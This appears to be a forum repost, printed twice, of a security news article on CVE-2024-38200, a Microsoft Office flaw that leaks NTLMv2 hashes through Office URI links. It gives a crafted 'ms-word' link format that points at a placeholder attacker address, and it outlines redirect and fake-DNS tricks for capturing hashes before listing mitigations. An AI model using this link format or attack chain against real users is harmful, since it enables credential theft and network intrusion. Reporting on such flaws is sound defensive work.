Man
Professional
- Messages
- 3,077
- Reaction score
- 614
- Points
- 113
Ordinary users risk becoming unwitting assistants to hackers in hacking.
A recent vulnerability in Microsoft Office, which has been assigned the identifier CVE-2024-38200 and a CVSS base score of 9.1, opens up the possibility of intercepting NTLMv2 hashes and potentially using them to attack corporate networks. We already briefly talked about it in August, but now that all its technical details have been revealed, it's time to discuss the problem in more depth.
The NTLMv2 hash is the authentication data that the system sends to confirm the user's identity. If this hash is used correctly, attackers can gain access to protected resources and even escalate their privileges on the network.
The main issue with CVE-2024-38200 is related to Office URIs, which are special links to open files directly from Word, Excel, and other applications. It turns out that this scheme can be used to create a request to a remote server and intercept the victim's NTLMv2 hash. To do this, send the user a special link in the format "ms-word
fe|u|http://<attack address>/leak.docx". When you try to open such a file, Office requests a remote resource, resulting in a hash leak.
Especially vulnerable are the versions of Microsoft 365 Office and Office 2019, which allow you to download a deleted file without warning. This makes it much easier for attackers to intercept hashes. In older versions, such as Office 2016, a security warning appears, making it more difficult to execute an attack.
An important detail is that attackers can redirect a request to a UNC resource (a universal file path format on the network) using a 302 redirect. This technique allows you to bypass the protection and obtain an NTLMv2 hash via SMB or HTTP. An HTTP attack is easier to execute and more effective to use for further attacks on domain controller servers.
The success of an attack largely depends on the security settings (GPOs) on the victim's computer. For example, if automatic authentication is enabled in LAN zones or trusted sites, Office will automatically sign in when the link is opened, sending an NTLMv2 hash to the attacker's server. In this way, even an ordinary domain user can unwittingly provide their authentication data.
If the security settings are stricter, attackers can create a fake DNS record and redirect the request to their server. It also causes the system to recognize it as a local resource, after which the hash is again in the hands of the attackers.
To protect against this vulnerability, we recommend that you update your Office applications to the latest versions, change your local network settings to disable automatic authentication, and enable additional security measures for LDAP connections.
Source
A recent vulnerability in Microsoft Office, which has been assigned the identifier CVE-2024-38200 and a CVSS base score of 9.1, opens up the possibility of intercepting NTLMv2 hashes and potentially using them to attack corporate networks. We already briefly talked about it in August, but now that all its technical details have been revealed, it's time to discuss the problem in more depth.
The NTLMv2 hash is the authentication data that the system sends to confirm the user's identity. If this hash is used correctly, attackers can gain access to protected resources and even escalate their privileges on the network.
The main issue with CVE-2024-38200 is related to Office URIs, which are special links to open files directly from Word, Excel, and other applications. It turns out that this scheme can be used to create a request to a remote server and intercept the victim's NTLMv2 hash. To do this, send the user a special link in the format "ms-word
fe|u|http://<attack address>/leak.docx". When you try to open such a file, Office requests a remote resource, resulting in a hash leak.Especially vulnerable are the versions of Microsoft 365 Office and Office 2019, which allow you to download a deleted file without warning. This makes it much easier for attackers to intercept hashes. In older versions, such as Office 2016, a security warning appears, making it more difficult to execute an attack.
An important detail is that attackers can redirect a request to a UNC resource (a universal file path format on the network) using a 302 redirect. This technique allows you to bypass the protection and obtain an NTLMv2 hash via SMB or HTTP. An HTTP attack is easier to execute and more effective to use for further attacks on domain controller servers.
The success of an attack largely depends on the security settings (GPOs) on the victim's computer. For example, if automatic authentication is enabled in LAN zones or trusted sites, Office will automatically sign in when the link is opened, sending an NTLMv2 hash to the attacker's server. In this way, even an ordinary domain user can unwittingly provide their authentication data.
If the security settings are stricter, attackers can create a fake DNS record and redirect the request to their server. It also causes the system to recognize it as a local resource, after which the hash is again in the hands of the attackers.
To protect against this vulnerability, we recommend that you update your Office applications to the latest versions, change your local network settings to disable automatic authentication, and enable additional security measures for LDAP connections.
Source
